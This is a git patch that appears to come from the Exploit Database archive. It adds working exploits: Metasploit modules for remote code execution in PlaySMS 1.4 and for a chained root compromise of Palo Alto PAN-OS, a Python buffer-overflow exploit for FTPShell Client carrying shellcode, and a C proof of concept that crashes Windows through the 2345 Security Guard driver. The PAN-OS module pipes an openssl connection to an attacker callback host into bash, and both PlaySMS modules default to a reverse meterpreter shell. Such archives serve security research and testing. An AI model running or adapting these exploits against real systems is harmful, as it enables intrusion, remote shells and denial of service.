From 635ec8450438d1b907fbd0b84ee2ec777bc67dba Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 9 May 2018 05:01:46 +0000 Subject: [PATCH] DB: 2018-05-09 5 changes to exploits/shellcodes 2345 Security Guard 3.7 - Denial of Service FTPShell Client 6.7 - Buffer Overflow Palo Alto Networks - readSessionVarsFromFile() Session Corruption (Metasploit) PlaySMS - import.php Authenticated CSV File Upload Code Execution (Metasploit) PlaySMS 1.4 - sendfromfile.php Authenticated _Filename_ Field Code Execution (Metasploit) Linux/x86 - execve(/bin/sh) NOT Encoded Shellcode (27 bytes) Linux/x86 - execve(/bin/sh) + NOT Encoded Shellcode (27 bytes) --- exploits/php/remote/44598.rb | 193 ++++++++++++++++++++++++++++++ exploits/php/remote/44599.rb | 189 +++++++++++++++++++++++++++++ exploits/unix/remote/44597.rb | 198 +++++++++++++++++++++++++++++++ exploits/windows/remote/44596.py | 58 +++++++++ exploits/windows_x86/dos/44600.c | 180 ++++++++++++++++++++++++++++ files_exploits.csv | 5 + files_shellcodes.csv | 2 +- 7 files changed, 824 insertions(+), 1 deletion(-) create mode 100755 exploits/php/remote/44598.rb create mode 100755 exploits/php/remote/44599.rb create mode 100755 exploits/unix/remote/44597.rb create mode 100755 exploits/windows/remote/44596.py create mode 100644 exploits/windows_x86/dos/44600.c diff --git a/exploits/php/remote/44598.rb b/exploits/php/remote/44598.rb new file mode 100755 index 000000000..000754887 --- /dev/null +++ b/exploits/php/remote/44598.rb @@ -0,0 +1,193 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'PlaySMS import.php Authenticated CSV File Upload Code Execution', + 'Description' => %q{ + This module exploits an authenticated file upload remote code excution vulnerability + in PlaySMS Version 1.4. This issue is caused by improper file contents handling in + import.php (aka the Phonebook import feature). Authenticated Users can upload a CSV + file containing a malicious payload via vectors involving the User-Agent HTTP header + and PHP code in the User-Agent. + This module was tested against PlaySMS 1.4 on VulnHub's Dina 1.0 machine and Windows 7. + }, + 'Author' => + [ + 'Touhid M.Shaikh ' # Discoverys and Metasploit Module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE','2017-9101'], + ['URL','https://www.youtube.com/watch?v=KIB9sKQdEwE'], + ['EDB','42044'] + ], + 'DefaultOptions' => + { + 'SSL' => false, + 'PAYLOAD' => 'php/meterpreter/reverse_tcp', + 'ENCODER' => 'php/base64', + }, + 'Privileged' => false, + 'Platform' => ['php'], + 'Arch' => ARCH_PHP, + 'Targets' => + [ + [ 'PlaySMS 1.4', { } ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'May 21 2017')) + + register_options( + [ + OptString.new('TARGETURI', [ true, "Base playsms directory path", '/']), + OptString.new('USERNAME', [ true, "Username to authenticate with", 'admin']), + OptString.new('PASSWORD', [ true, "Password to authenticate with", 'admin']) + ]) + end + + def uri + return target_uri.path + end + + def check + begin + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(uri, 'index.php') + }) + rescue + vprint_error('Unable to access the index.php file') + return CheckCode::Unknown + end + + if res.code == 302 && res.headers['Location'].include?('index.php?app=main&inc=core_auth&route=login') + return Exploit::CheckCode::Appears + end + + return CheckCode::Safe + end + + def login + res = send_request_cgi({ + 'uri' => normalize_uri(uri, 'index.php'), + 'method' => 'GET', + 'vars_get' => { + 'app' => 'main', + 'inc' => 'core_auth', + 'route' => 'login', + } + }) + + # Grabbing CSRF token from body + /name="X-CSRF-Token" value="(?[a-z0-9"]+)">/ =~ res.body + fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine CSRF token") if csrf.nil? + vprint_good("X-CSRF-Token for login : #{csrf}") + + cookies = res.get_cookies + vprint_status('Trying to Login ......') + # Send Creds with cookies. + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(uri, 'index.php'), + 'cookie' => cookies, + 'vars_get' => Hash[{ + 'app' => 'main', + 'inc' => 'core_auth', + 'route' => 'login', + 'op' => 'login', + }.to_a.shuffle], + 'vars_post' => Hash[{ + 'X-CSRF-Token' => csrf, + 'username' => datastore['USERNAME'], + 'password' => datastore['PASSWORD'] + }.to_a.shuffle], + }) + + fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to Login request") if res.nil? + + # Try to access index page with authenticated cookie. + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(uri, 'index.php'), + 'cookie' => cookies, + }) + + # if we redirect to core_welcome dan we assume we have authenticated cookie. + if res.code == 302 && res.headers['Location'].include?('index.php?app=main&inc=core_welcome') + print_good("Authentication successful: #{datastore['USERNAME']}:#{datastore['PASSWORD']}") + store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD']) + return cookies + else + fail_with(Failure::UnexpectedReply, "#{peer} - Authentication Failed :[ #{datastore['USERNAME']}:#{datastore['PASSWORD']} ]") + end + end + + + # Tested successfully on Dina: 1.0.1 machine on vulnhub. + # Link : https://www.vulnhub.com/entry/dina-101,200/ + def exploit + + cookies = login + + # Agian CSRF token. + res = send_request_cgi({ + 'uri' => normalize_uri(uri, 'index.php'), + 'method' => 'GET', + 'cookie' => cookies, + 'vars_get' => Hash[{ + 'app' => 'main', + 'inc' => 'feature_phonebook', + 'route' => 'import', + 'op' => 'list', + }.to_a.shuffle] + }) + + fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to Login request") if res.nil? + + # Grabbing CSRF token from body + /name="X-CSRF-Token" value="(?[a-z0-9"]+)">/ =~ res.body + fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine CSRF token") if csrf.nil? + vprint_good("X-CSRF-Token for upload : #{csrf}") + + # Payload. + evil = "" + #making csv file body + final_csv = "Name,Email,Department\n" + final_csv << "#{evil},#{rand(1..100)},#{rand(1..100)}" + # setup POST request. + post_data = Rex::MIME::Message.new + post_data.add_part(csrf, content_type = nil, transfer_encoding = nil, content_disposition = 'form-data; name="X-CSRF-Token"') # CSRF token + post_data.add_part(final_csv, content_type = 'text/csv', transfer_encoding = nil, content_disposition = 'form-data; name="fnpb"; filename="agent22.csv"') #payload + data = post_data.to_s + + vprint_status('Trying to upload malicious CSV file ....') + # Lets Send Upload request. + res = send_request_cgi({ + 'uri' => normalize_uri(uri, 'index.php'), + 'method' => 'POST', + 'agent' => payload.encode, + 'cookie' => cookies, + 'vars_get' => Hash[{ + 'app' => 'main', + 'inc' => 'feature_phonebook', + 'route' => 'import', + 'op' => 'import', + }.to_a.shuffle], + 'headers' => { + 'Upgrade-Insecure-Requests' => '1', + }, + 'Connection' => 'close', + 'data' => data, + 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", + }) + end +end \ No newline at end of file diff --git a/exploits/php/remote/44599.rb b/exploits/php/remote/44599.rb new file mode 100755 index 000000000..b28cd76e9 --- /dev/null +++ b/exploits/php/remote/44599.rb @@ -0,0 +1,189 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'PlaySMS sendfromfile.php Authenticated "Filename" Field Code Execution', + 'Description' => %q{ + This module exploits a code injection vulnerability within an authenticated file + upload feature in PlaySMS v1.4. This issue is caused by improper file name handling + in sendfromfile.php file. + Authenticated Users can upload a file and rename the file with a malicious payload. + This module was tested against PlaySMS 1.4 on VulnHub's Dina 1.0 machine and Windows 7. + }, + 'Author' => + [ + 'Touhid M.Shaikh ', # Discoverys and Metasploit Module + 'DarkS3curity' # Metasploit Module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['EDB','42003'], + ['CVE','2017-9080'], + ['URL','https://www.youtube.com/watch?v=MuYoImvfpew'], + ['URL','http://touhidshaikh.com/blog/?p=336'] + ], + 'DefaultOptions' => + { + 'SSL' => false, + 'PAYLOAD' => 'php/meterpreter/reverse_tcp', + 'ENCODER' => 'php/base64', + }, + 'Privileged' => false, + 'Platform' => ['php'], + 'Arch' => ARCH_PHP, + 'Targets' => + [ + [ 'PlaySMS 1.4', { } ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'May 21 2017')) + + register_options( + [ + OptString.new('TARGETURI', [ true, "Base playsms directory path", '/']), + OptString.new('USERNAME', [ true, "Username to authenticate with", 'admin']), + OptString.new('PASSWORD', [ true, "Password to authenticate with", 'admin']) + ]) + end + + def uri + return target_uri.path + end + + def check + begin + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(uri, 'index.php') + }) + rescue + vprint_error('Unable to access the index.php file') + return CheckCode::Unknown + end + + if res.code == 302 && res.headers['Location'].include?('index.php?app=main&inc=core_auth&route=login') + return Exploit::CheckCode::Appears + end + + CheckCode::Safe + end + + def login + res = send_request_cgi({ + 'uri' => normalize_uri(uri, 'index.php'), + 'method' => 'GET', + 'vars_get' => { + 'app' => 'main', + 'inc' => 'core_auth', + 'route' => 'login', + } + }) + + # Grabbing CSRF token from body + /name="X-CSRF-Token" value="(?[a-z0-9"]+)">/ =~ res.body + fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine CSRF token") if csrf.nil? + vprint_good("X-CSRF-Token for login : #{csrf}") + + cookies = res.get_cookies + vprint_status('Trying to Login ......') + # Send Creds with cookies. + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(uri, 'index.php'), + 'cookie' => cookies, + 'vars_get' => Hash[{ + 'app' => 'main', + 'inc' => 'core_auth', + 'route' => 'login', + 'op' => 'login', + }.to_a.shuffle], + 'vars_post' => Hash[{ + 'X-CSRF-Token' => csrf, + 'username' => datastore['USERNAME'], + 'password' => datastore['PASSWORD'] + }.to_a.shuffle], + }) + + fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to Login request") if res.nil? + + # Try to access index page with authenticated cookie. + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(uri, 'index.php'), + 'cookie' => cookies, + }) + + fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to Login request") if res.nil? + + # if we redirect to core_welcome dan we assume we have authenticated cookie. + if res.code == 302 && res.headers['Location'].include?('index.php?app=main&inc=core_welcome') + print_good("Authentication successful : [ #{datastore['USERNAME']} : #{datastore['PASSWORD']} ]") + store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD']) + return cookies + else + fail_with(Failure::UnexpectedReply, "#{peer} - Authentication Failed :[ #{datastore['USERNAME']}:#{datastore['PASSWORD']} ]") + end + end + + def exploit + cookies = login + + # Agian CSRF token. + res = send_request_cgi({ + 'uri' => normalize_uri(uri, 'index.php'), + 'method' => 'GET', + 'cookie' => cookies, + 'vars_get' => Hash[{ + 'app' => 'main', + 'inc' => 'feature_sendfromfile', + 'op' => 'list', + }.to_a.shuffle] + }) + + fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to Login request") if res.nil? + + # Grabbing CSRF token from body. + /name="X-CSRF-Token" value="(?[a-z0-9"]+)">/ =~ res.body + fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine CSRF token") if csrf.nil? + vprint_good("X-CSRF-Token for upload : #{csrf}") + + # Payload. + evilname = "" + + # setup POST request. + post_data = Rex::MIME::Message.new + post_data.add_part(csrf, content_type = nil, transfer_encoding = nil, content_disposition = 'form-data; name="X-CSRF-Token"') # CSRF token + post_data.add_part("#{rand_text_alpha(8 + rand(5))}", content_type = 'application/octet-stream', transfer_encoding = nil, content_disposition = "form-data; name=\"fncsv\"; filename=\"#{evilname}\"") # payload + post_data.add_part("1", content_type = nil, transfer_encoding = nil, content_disposition = 'form-data; name="fncsv_dup"') # extra + data = post_data.to_s + + vprint_status('Trying to upload file with malicious Filename Field....') + # Lets Send Upload request. + res = send_request_cgi({ + 'uri' => normalize_uri(uri, 'index.php'), + 'method' => 'POST', + 'agent' => payload.encode, + 'cookie' => cookies, + 'vars_get' => Hash[{ + 'app' => 'main', + 'inc' => 'feature_sendfromfile', + 'op' => 'upload_confirm', + }.to_a.shuffle], + 'headers' => { + 'Upgrade-Insecure-Requests' => '1', + }, + 'Connection' => 'close', + 'data' => data, + 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", + }) + end +end \ No newline at end of file diff --git a/exploits/unix/remote/44597.rb b/exploits/unix/remote/44597.rb new file mode 100755 index 000000000..819320bc5 --- /dev/null +++ b/exploits/unix/remote/44597.rb @@ -0,0 +1,198 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Palo Alto Networks readSessionVarsFromFile() Session Corruption', + 'Description' => %q{ + This module exploits a chain of vulnerabilities in Palo Alto Networks products running + PAN-OS versions prior to 6.1.19, 7.0.19, 7.1.14, and 8.0.6. This chain starts by using + an authentication bypass flaw to to exploit an XML injection issue, which is then + abused to create an arbitrary directory, and finally gains root code execution by + exploiting a vulnerable cron script. This module uses an initial reverse TLS callback + to stage arbitrary payloads on the target appliance. The cron job used for the final + payload runs every 15 minutes by default and exploitation can take up to 20 minutes. + }, + 'Author' => [ + 'Philip Pettersson ', # Vulnerability discovery + 'hdm' # Metasploit module + ], + 'References' => [ + ['CVE', '2017-15944'], + ['URL', 'http://seclists.org/fulldisclosure/2017/Dec/38'], + ['BID', '102079'], + ], + 'DisclosureDate' => 'Dec 11 2017', + 'License' => MSF_LICENSE, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Privileged' => true, + 'Payload' => {'BadChars' => '', 'Space' => 8000, 'DisableNops' => true}, + 'Targets' => [['Automatic', {}]], + 'DefaultTarget' => 0, + 'DefaultOptions' => {'WfsDelay' => 2} + )) + + register_options( + [ + Opt::RPORT(443), + OptBool.new('SSL', [true, 'Use SSL', true]), + OptAddress.new('CBHOST', [ false, "The listener address used for staging the real payload" ]), + OptPort.new('CBPORT', [ false, "The listener port used for staging the real payload" ]) + ]) + end + + def exploit + + # Prefer CBHOST, but use LHOST, or autodetect the IP otherwise + cbhost = datastore['CBHOST'] || datastore['LHOST'] || Rex::Socket.source_address(datastore['RHOST']) + + # Start a listener + start_listener(true) + + # Figure out the port we picked + cbport = self.service.getsockname[2] + + # Set the base directory and the staging payload directory path name + base_directory = "/opt/pancfg/mgmt/logdb/traffic/1/" + command_payload = "* -print -exec bash -c openssl${IFS}s_client${IFS}-quiet${IFS}-connect${IFS}#{cbhost}:#{cbport}|bash ; " + target_directory = base_directory + command_payload + + if target_directory.length > 255 + print_error("The selected payload or options resulted in an encoded command that is too long (255+ bytes)") + return + end + + dev_str_1 = Rex::Text.rand_text_alpha_lower(1+rand(10)) + dev_str_2 = Rex::Text.rand_text_alpha_lower(1+rand(10)) + user_id = rand(2000).to_s + + print_status("Creating our corrupted session ID...") + + # Obtain a session cookie linked to a corrupted session file. A raw request + # is needed to prevent encoding of the parameters injected into the session + res = send_request_raw( + 'method' => 'GET', + 'uri' => "/esp/cms_changeDeviceContext.esp?device=#{dev_str_1}:#{dev_str_2}%27\";user|s.\"#{user_id}\";" + ) + unless res && res.body.to_s.index('@start@Success@end@') + print_error("Unexpected response when creating the corrupted session cookie: #{res.code} #{res.message}") + return + end + + cookies = res.get_cookies + unless cookies =~ /PHPSESSID=([a-fA-F0-9]+)/ + print_error("Unexpected cookie response when creating the corrupted session cookie: #{res.code} #{res.message} #{cookies}") + return + end + + create_directory_tid = 1 + rand(1000) + create_directory_json = JSON.dump({ + "action" => "PanDirect", + "method" => "execute", + "data" => [ + Rex::Text.md5(create_directory_tid.to_s), + "Administrator.get", + { + "changeMyPassword" => true, + "template" => Rex::Text.rand_text_alpha_lower(rand(9) + 3), + "id" => "admin']\" async-mode='yes' refresh='yes' cookie='../../../../../..#{target_directory}'/>\x00" + } + ], + "type" => "rpc", + "tid" => create_directory_tid + }) + + print_status("Calling Administrator.get to create directory under #{base_directory}...") + res = send_request_cgi( + 'method' => 'POST', + 'uri' => '/php/utils/router.php/Administrator.get', + 'cookie' => cookies, + 'ctype' => "application/json", + 'data' => create_directory_json + ) + unless res && res.body.to_s.index('Async request enqueued') + print_error("Unexpected response when calling Administrator.get method: #{res.code} #{res.message}") + return + end + + register_dirs_for_cleanup(base_directory) + + print_status("Waiting up to 20 minutes for the cronjob to fire and execute...") + expiry = Time.at(Time.now.to_i + (60*20)).to_i + last_notice = 0 + while expiry > Time.now.to_i && ! session_created? + if last_notice + 30 < Time.now.to_i + print_status("Waiting for a session, #{expiry - Time.now.to_i} seconds left...") + last_notice = Time.now.to_i + end + sleep(1) + end + + unless session_created? + print_error("No connection received from the target, giving up.") + end + + end + + def stage_real_payload(cli) + print_good("Sending payload of #{payload.encoded.length} bytes to #{cli.peerhost}:#{cli.peerport}...") + cli.put(payload.encoded + "\n") + end + + def start_listener(ssl = false) + comm = datastore['ListenerComm'] + if comm == "local" + comm = ::Rex::Socket::Comm::Local + else + comm = nil + end + + self.service = Rex::Socket::TcpServer.create( + 'LocalPort' => datastore['CBPORT'], + 'SSL' => true, + 'SSLCert' => datastore['SSLCert'], + 'Comm' => comm, + 'Context' => + { + 'Msf' => framework, + 'MsfExploit' => self, + }) + + self.service.on_client_connect_proc = Proc.new { |client| + stage_real_payload(client) + } + + # Start the listening service + self.service.start + end + + def cleanup + super + if self.service + print_status("Shutting down payload stager listener...") + begin + self.service.deref if self.service.kind_of?(Rex::Service) + if self.service.kind_of?(Rex::Socket) + self.service.close + self.service.stop + end + self.service = nil + rescue ::SocketError + end + end + end + + # Accessor for our TCP payload stager + attr_accessor :service + +end \ No newline at end of file diff --git a/exploits/windows/remote/44596.py b/exploits/windows/remote/44596.py new file mode 100755 index 000000000..3f8b05806 --- /dev/null +++ b/exploits/windows/remote/44596.py @@ -0,0 +1,58 @@ +# -*- coding: utf-8 -*- + +# Exploit Title: FTPShell Client 6.7 - Remote Buffer Overflow +# Date: 2018-01-03 +# Exploit Author: Sebastián Castro @r4wd3r +# Vendor Homepage: http://www.ftpshell.com/index.htm +# Software Link: http://www.ftpshell.com/download.htm +# Version: 6.7 +# Tested on: Windows Server 2008 R2 x64, Windows 7 SP1 x64, Windows XP SP3 x86. +# CVE : CVE-2018-7573 + +import socket +import sys + +port = 21 + +# msfvenom -p windows/exec CMD=calc.exe -f python -b '\x00\x22\x0d\x0a' +buf = "" +buf += "\xdb\xc8\xba\x3e\x93\x15\x8f\xd9\x74\x24\xf4\x5e\x33" +buf += "\xc9\xb1\x31\x31\x56\x18\x03\x56\x18\x83\xc6\x3a\x71" +buf += "\xe0\x73\xaa\xf7\x0b\x8c\x2a\x98\x82\x69\x1b\x98\xf1" +buf += "\xfa\x0b\x28\x71\xae\xa7\xc3\xd7\x5b\x3c\xa1\xff\x6c" +buf += "\xf5\x0c\x26\x42\x06\x3c\x1a\xc5\x84\x3f\x4f\x25\xb5" +buf += "\x8f\x82\x24\xf2\xf2\x6f\x74\xab\x79\xdd\x69\xd8\x34" +buf += "\xde\x02\x92\xd9\x66\xf6\x62\xdb\x47\xa9\xf9\x82\x47" +buf += "\x4b\x2e\xbf\xc1\x53\x33\xfa\x98\xe8\x87\x70\x1b\x39" +buf += "\xd6\x79\xb0\x04\xd7\x8b\xc8\x41\xdf\x73\xbf\xbb\x1c" +buf += "\x09\xb8\x7f\x5f\xd5\x4d\x64\xc7\x9e\xf6\x40\xf6\x73" +buf += "\x60\x02\xf4\x38\xe6\x4c\x18\xbe\x2b\xe7\x24\x4b\xca" +buf += "\x28\xad\x0f\xe9\xec\xf6\xd4\x90\xb5\x52\xba\xad\xa6" +buf += "\x3d\x63\x08\xac\xd3\x70\x21\xef\xb9\x87\xb7\x95\x8f" +buf += "\x88\xc7\x95\xbf\xe0\xf6\x1e\x50\x76\x07\xf5\x15\x88" +buf += "\x4d\x54\x3f\x01\x08\x0c\x02\x4c\xab\xfa\x40\x69\x28" +buf += "\x0f\x38\x8e\x30\x7a\x3d\xca\xf6\x96\x4f\x43\x93\x98" +buf += "\xfc\x64\xb6\xfa\x63\xf7\x5a\xd3\x06\x7f\xf8\x2b" + +try: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.bind(("0.0.0.0", port)) + s.listen(5) + print("[+] FTP server started on port: "+str(port)+"\r\n") +except: + print("[x] Failed to start the server on port: "+str(port)+"\r\n") + +eip = "\xed\x2e\x45" # CALL ESI from FTPShell.exe : 0x00452eed +nops = "\x90"*40 +junk = "F"*(400 - len(nops) - len(buf)) +payload = nops + buf + junk + eip + +while True: + conn, addr = s.accept() + conn.send('220 FTP Server\r\n') + print(conn.recv(1024)) + conn.send("331 OK\r\n") + print(conn.recv(1024)) + conn.send('230 OK\r\n') + print(conn.recv(1024)) + conn.send('220 "'+payload+'" is current directory\r\n') \ No newline at end of file diff --git a/exploits/windows_x86/dos/44600.c b/exploits/windows_x86/dos/44600.c new file mode 100644 index 000000000..24c95c36a --- /dev/null +++ b/exploits/windows_x86/dos/44600.c @@ -0,0 +1,180 @@ +# Exploit Title: 2345 Security Guard 3.7 - Denial of Service +# Date: 2018-05-08 +# Exploit Author: anhkgg +# Vendor Homepage: http://safe.2345.cc/ +# Software Link: http://dl.2345.cc/2345pcsafe/2345pcsafe_v3.7.0.9345.exe +# Version: v3.7 +# Tested on: Windows 7 x86 +# CVE : CVE-2018-10809 +# +# BSOD caused of 2345NetFirewall.sys because of not validating input values,test version 3.7 on windows 7 x86 platform +# +# + +#include +#include + +struct NETFW_IOCTL_ADD_PID +{ + DWORD pid; + char seed[0x14];// +};//0x18 + +struct NETFW_IOCTL_SET_PID +{ + BYTE set_state;// + BYTE unk;//1 + WORD buf_len;//2 + DWORD pid;//4 + char buf[0x64];//8 +};//6c + +struct NETFW_IOCTL_222040 +{ + DWORD* ptr; + DWORD size; +};// + +int __stdcall f_XOR__12A30(BYTE *a1, BYTE *a2) +{ + int result; + + *a1 ^= *a2; + *a2 ^= *a1; + result = (unsigned __int8)*a2; + *a1 ^= result; + return result; +} + +int __stdcall sub_12A80(char *a1, int len, char *a3) +{ + int result; + unsigned __int8 v4; + __int16 i; + __int16 j; + unsigned __int8 k; + + for ( i = 0; i < 256; ++i ) + a3[i] = i; + a3[256] = 0; + a3[257] = 0; + k = 0; + v4 = 0; + result = 0; + for ( j = 0; j < 256; ++j ) + { + v4 += a3[j] + a1[k]; + f_XOR__12A30((BYTE*)&a3[j], (BYTE*)&a3[v4]); + result = (k + 1) / len; + k = (k + 1) % len; + } + return result; +} + +char *__stdcall sub_12B60(char *a1, signed int len, char *a3) +{ + char *result; + __int16 i; + unsigned __int8 v5; + unsigned __int8 v6; + + v5 = a3[256]; + v6 = a3[257]; + for ( i = 0; i < len; ++i ) + { + v6 += a3[++v5]; + f_XOR__12A30((BYTE*)&a3[v5], (BYTE*)&a3[v6]); + a1[i] ^= a3[(unsigned __int8)(a3[v6] + a3[v5])]; + } + a3[256] = v5; + result = a3; + a3[257] = v6; + return result; +} + +void calc_seed(char* seed, char* dst) +{ + char Source1[26] = {0}; + char a3[300] = {0}; + + Source1[0] = 8; + Source1[1] = 14; + Source1[2] = 8; + Source1[3] = 10; + Source1[4] = 2; + Source1[5] = 3; + Source1[6] = 29; + Source1[7] = 23; + Source1[8] = 13; + Source1[9] = 3; + Source1[10] = 15; + Source1[11] = 22; + Source1[12] = 15; + Source1[13] = 7; + Source1[14] = 91; + Source1[15] = 4; + Source1[16] = 18; + Source1[17] = 26; + Source1[18] = 26; + Source1[19] = 3; + Source1[20] = 4; + Source1[21] = 1; + Source1[22] = 15; + Source1[23] = 25; + Source1[24] = 10; + Source1[25] = 13; + + sub_12A80(seed, 0x14, a3); + sub_12B60(Source1, 0x1A, a3); + memcpy(dst, Source1, 26); +} + +int poc_2345NetFirewall() +{ + HANDLE h = CreateFileA("\\\\.\\2345NetFirewall", + GENERIC_READ|GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, + NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); + if(h == INVALID_HANDLE_VALUE) { + printf("[-] Open device error: %d\n", GetLastError()); + return 1; + } + DWORD BytesReturned = 0; + + DWORD ctlcode = 0x222298; + NETFW_IOCTL_ADD_PID add_pid = {0}; + add_pid.pid = GetCurrentProcessId(); + + if(!DeviceIoControl(h, ctlcode, &add_pid, sizeof(NETFW_IOCTL_ADD_PID), &add_pid, sizeof(NETFW_IOCTL_ADD_PID), &BytesReturned, NULL)) { + printf("[-] DeviceIoControl %x error: %d\n", ctlcode, GetLastError()); + } + + ctlcode = 0x2222A4; + NETFW_IOCTL_SET_PID set_pid = {0}; + set_pid.pid = GetCurrentProcessId(); + set_pid.set_state = 1; + + calc_seed(add_pid.seed, set_pid.buf); + set_pid.buf_len = 26; + + if(!DeviceIoControl(h, ctlcode, &set_pid, sizeof(NETFW_IOCTL_SET_PID), &set_pid, sizeof(NETFW_IOCTL_SET_PID), &BytesReturned, NULL)) { + printf("[-] DeviceIoControl %x error: %d\n", ctlcode, GetLastError()); + } + + //BSOD + ctlcode = 0x222040; + NETFW_IOCTL_222040 buf_222040 = {0}; + buf_222040.size = 1; + buf_222040.ptr = (DWORD*)0x80000000; + if(!DeviceIoControl(h, ctlcode, &buf_222040, sizeof(NETFW_IOCTL_222040), &buf_222040, sizeof(NETFW_IOCTL_222040), &BytesReturned, NULL)) { + printf("[-] DeviceIoControl %x error: %d\n", ctlcode, GetLastError()); + } + + return 0; +} + +int main() +{ + poc_2345NetFirewall(); + + return 0; +} \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 675b21eab..7496ae29e 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -5966,6 +5966,7 @@ id,file,description,date,author,type,platform,port 44572,exploits/windows/dos/44572.txt,"Schneider Electric InduSoft Web Studio and InTouch Machine Edition - Denial of Service",2018-05-02,"Tenable NS",dos,windows, 44579,exploits/linux/dos/44579.c,"Linux Kernel < 4.17-rc1 - 'AF_LLC' Double Free",2018-04-30,SecuriTeam,dos,linux, 44593,exploits/windows/dos/44593.py,"HWiNFO 5.82-3410 - Denial of Service",2018-05-06,bzyo,dos,windows, +44600,exploits/windows_x86/dos/44600.c,"2345 Security Guard 3.7 - Denial of Service",2018-05-08,anhkgg,dos,windows_x86, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -16472,6 +16473,10 @@ id,file,description,date,author,type,platform,port 44577,exploits/hardware/remote/44577.py,"TBK DVR4104 / DVR4216 - Credentials Leak",2018-05-02,ezelf,remote,hardware, 44582,exploits/windows/remote/44582.txt,"Call of Duty Modern Warefare 2 - Buffer Overflow",2018-05-02,momo5502,remote,windows, 44584,exploits/multiple/remote/44584.txt,"Google Chrome V8 - Object Allocation Size Integer Overflow",2018-05-04,"Google Security Research",remote,multiple, +44596,exploits/windows/remote/44596.py,"FTPShell Client 6.7 - Buffer Overflow",2018-05-08,r4wd3r,remote,windows, +44597,exploits/unix/remote/44597.rb,"Palo Alto Networks - readSessionVarsFromFile() Session Corruption (Metasploit)",2018-05-08,Metasploit,remote,unix,443 +44598,exploits/php/remote/44598.rb,"PlaySMS - import.php Authenticated CSV File Upload Code Execution (Metasploit)",2018-05-08,Metasploit,remote,php, +44599,exploits/php/remote/44599.rb,"PlaySMS 1.4 - sendfromfile.php Authenticated _Filename_ Field Code Execution (Metasploit)",2018-05-08,Metasploit,remote,php, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, diff --git a/files_shellcodes.csv b/files_shellcodes.csv index 3b46caa62..3b9d7e237 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -880,4 +880,4 @@ id,file,description,date,author,type,platform 44509,shellcodes/linux_x86/44509.c,"Linux/x86 - chmod 4755 /bin/dash Shellcode (33 bytes)",2018-04-24,absolomb,shellcode,linux_x86 44510,shellcodes/linux_x86/44510.c,"Linux/x86 - execve(cp /bin/sh /tmp/sh; chmod +s /tmp/sh) + Null-Free Shellcode (74 bytes)",2018-04-24,absolomb,shellcode,linux_x86 44517,shellcodes/linux_x86/44517.c,"Linux/x86 - execve(/bin/sh) + ROT-13 + RShift-2 + XOR Encoded Shellcode (44 bytes)",2018-04-24,"Nuno Freitas",shellcode,linux_x86 -44594,shellcodes/linux_x86/44594.c,"Linux/x86 - execve(/bin/sh) NOT Encoded Shellcode (27 bytes)",2018-05-06,"Nuno Freitas",shellcode,linux_x86 +44594,shellcodes/linux_x86/44594.c,"Linux/x86 - execve(/bin/sh) + NOT Encoded Shellcode (27 bytes)",2018-05-06,"Nuno Freitas",shellcode,linux_x86